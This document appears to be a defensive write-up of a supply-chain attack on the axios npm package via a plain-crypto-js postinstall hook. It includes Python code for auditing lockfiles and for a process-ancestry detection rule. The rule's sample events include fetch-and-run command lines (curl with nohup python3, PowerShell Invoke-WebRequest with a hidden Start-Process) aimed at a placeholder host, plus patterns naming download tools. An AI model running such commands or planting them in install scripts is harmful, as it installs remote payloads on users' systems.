Mark0

Elastic releases detections for the Axios supply chain compromise

Elastic Security Labs has identified a supply-chain attack on the popular axios package, delivered through compromised versions 1.14.1 and 0.30.4. The attack avoids direct modification of the primary package; instead it uses a transitive dependency called plain-crypto-js to trigger malicious execution during the postinstall phase. This cross-platform campaign affects Linux, Windows, and macOS systems by spawning native shells to retrieve and execute second-stage payloads, such as Python-based RATs, PowerShell scripts, and Mach-O backdoors.
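A practical first check for the scenario above is to audit the lockfile rather than wait for a postinstall script to run. The following is an added example, not code from Elastic or the axios project: it reads an npm lockfile (lockfileVersion 2/3 layout, where packages that declare install hooks carry `hasInstallScript: true`), flags axios at the two versions the post names, lists every package that would run an install script, and shows which package pulls in a given transitive dependency. The sample lockfile, the plain-crypto-js version string, and the dependency edge from axios to plain-crypto-js are constructed for illustration.

```python
import json

# Versions the post names as the compromised axios releases.
COMPROMISED_AXIOS = {"1.14.1", "0.30.4"}

# Constructed npm lockfile (lockfileVersion 3 layout) for illustration only;
# the plain-crypto-js version and its dependency edge are assumptions.
SAMPLE_LOCKFILE = json.loads("""
{
  "name": "example-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "example-app", "dependencies": {"axios": "^1.14.0"}},
    "node_modules/axios": {
      "version": "1.14.1",
      "dependencies": {"plain-crypto-js": "*"}
    },
    "node_modules/plain-crypto-js": {
      "version": "0.0.0-constructed",
      "hasInstallScript": true
    },
    "node_modules/left-pad": {"version": "1.3.0"}
  }
}
""")


def package_name(path):
    """Map a lockfile path such as node_modules/a/node_modules/b to 'b'."""
    return path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock):
    """Return compromised axios entries and every package that runs an install script."""
    affected = []
    install_scripts = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # the root project entry, not a dependency
        name = package_name(path)
        version = meta.get("version", "")
        if name == "axios" and version in COMPROMISED_AXIOS:
            affected.append((path, version))
        # npm records preinstall/install/postinstall hooks with this flag.
        if meta.get("hasInstallScript"):
            install_scripts.append((path, version))
    return {"affected_axios": affected, "install_scripts": install_scripts}


def dependents_of(lock, target):
    """List the packages that declare `target` as a dependency (the transitive path)."""
    return [package_name(p) or "(root)"
            for p, m in lock.get("packages", {}).items()
            if target in m.get("dependencies", {})]


if __name__ == "__main__":
    report = audit_lockfile(SAMPLE_LOCKFILE)
    print("compromised axios:", report["affected_axios"])
    print("packages with install scripts:", report["install_scripts"])
    for path, _ in report["install_scripts"]:
        dep = package_name(path)
        print(f"{dep} is pulled in by: {dependents_of(SAMPLE_LOCKFILE, dep)}")
```

To run it against a real project, replace `SAMPLE_LOCKFILE` with `json.load(open("package-lock.json"))`. Install-script entries are the ones worth reviewing before running `npm install`; installing with `npm ci --ignore-scripts` in CI removes the postinstall execution path entirely, at the cost of packages that genuinely need a build step.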

The analysis highlights that while the payloads vary by operating system, the delivery mechanism remains consistent: a Node.js process initiates an OS-native execution path to fetch remote content and detach it from the parent process. Elastic provides several behavioral detection rules to counter these tactics, focusing on process ancestry and suspicious network retrievals rather than static indicators. The report concludes with detailed Indicators of Compromise (IOCs), including C2 domains, file hashes, and specific registry keys used for persistence.
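The behavioral pattern described above (a Node.js process spawning an OS-native shell that fetches remote content and detaches it) can be expressed as a small process-event rule. The following is an added example and not one of Elastic's published rules: it evaluates constructed events carrying ECS-style field names (`process.name`, `process.parent.name`, `process.command_line`) and only fires when a Node-spawned shell also shows a download utility or a detach idiom in its command line, so an ordinary `node-gyp rebuild` spawned from npm does not alert. The sample command lines and the `example.invalid` host are constructed.

```python
import re

# Constructed process events in ECS-style field names; none are real telemetry.
SAMPLE_EVENTS = [
    {"host.os.type": "linux", "process.name": "sh", "process.parent.name": "node",
     "process.command_line": "sh -c curl -fsSL http://example.invalid/stage2.py -o /tmp/s.py && nohup python3 /tmp/s.py &"},
    {"host.os.type": "windows", "process.name": "powershell.exe", "process.parent.name": "node.exe",
     "process.command_line": "powershell.exe -NoProfile -Command Invoke-WebRequest http://example.invalid/s.ps1 -OutFile %TEMP%\\s.ps1; Start-Process powershell -WindowStyle Hidden -File %TEMP%\\s.ps1"},
    # Benign: a native addon build spawned by npm, no fetch, no detach.
    {"host.os.type": "macos", "process.name": "bash", "process.parent.name": "node",
     "process.command_line": "bash -c node-gyp rebuild"},
    # Benign: a download, but not from a Node.js parent.
    {"host.os.type": "linux", "process.name": "curl", "process.parent.name": "bash",
     "process.command_line": "curl https://registry.npmjs.org/axios"},
]

# Process ancestry: Node.js (and package managers that run under it) as parent.
NODE_PARENTS = {"node", "node.exe", "npm", "npm.cmd", "yarn", "pnpm"}
# OS-native shells on Linux, macOS, and Windows.
SHELLS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}
# Remote retrieval utilities and cmdlets.
DOWNLOAD = re.compile(
    r"\b(curl|wget|invoke-webrequest|iwr|downloadstring|downloadfile|start-bitstransfer)\b", re.I)
# Idioms that detach the second stage from the parent process.
DETACH = re.compile(
    r"(\bnohup\b|\bsetsid\b|\bdisown\b|\bstart-process\b|\bstart /b\b|&\s*$)", re.I)


def classify(event):
    """Return the tactic tags that fire for one event (empty list if none)."""
    tags = []
    parent = event.get("process.parent.name", "").lower()
    name = event.get("process.name", "").lower()
    cmd = event.get("process.command_line", "")
    if parent in NODE_PARENTS and name in SHELLS:
        tags.append("node_spawned_shell")
        if DOWNLOAD.search(cmd):
            tags.append("remote_fetch")
        if DETACH.search(cmd):
            tags.append("detach_from_parent")
    return tags


def detect(events):
    """Keep only events where a Node-spawned shell also fetches or detaches."""
    hits = []
    for ev in events:
        tags = classify(ev)
        if "node_spawned_shell" in tags and len(tags) > 1:
            hits.append((ev["host.os.type"], ev["process.name"], tags))
    return hits


if __name__ == "__main__":
    for os_type, proc, tags in detect(SAMPLE_EVENTS):
        print(f"[{os_type}] {proc}: {', '.join(tags)}")
```

The ancestry condition alone is too noisy for a build host, since npm lifecycle scripts legitimately spawn shells; requiring a second behavior (retrieval or detachment) in the same command line is what keeps the rule usable, and it is the same reasoning that favors behavioral rules over the hash and domain indicators, which change with every rebuild of the payload.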
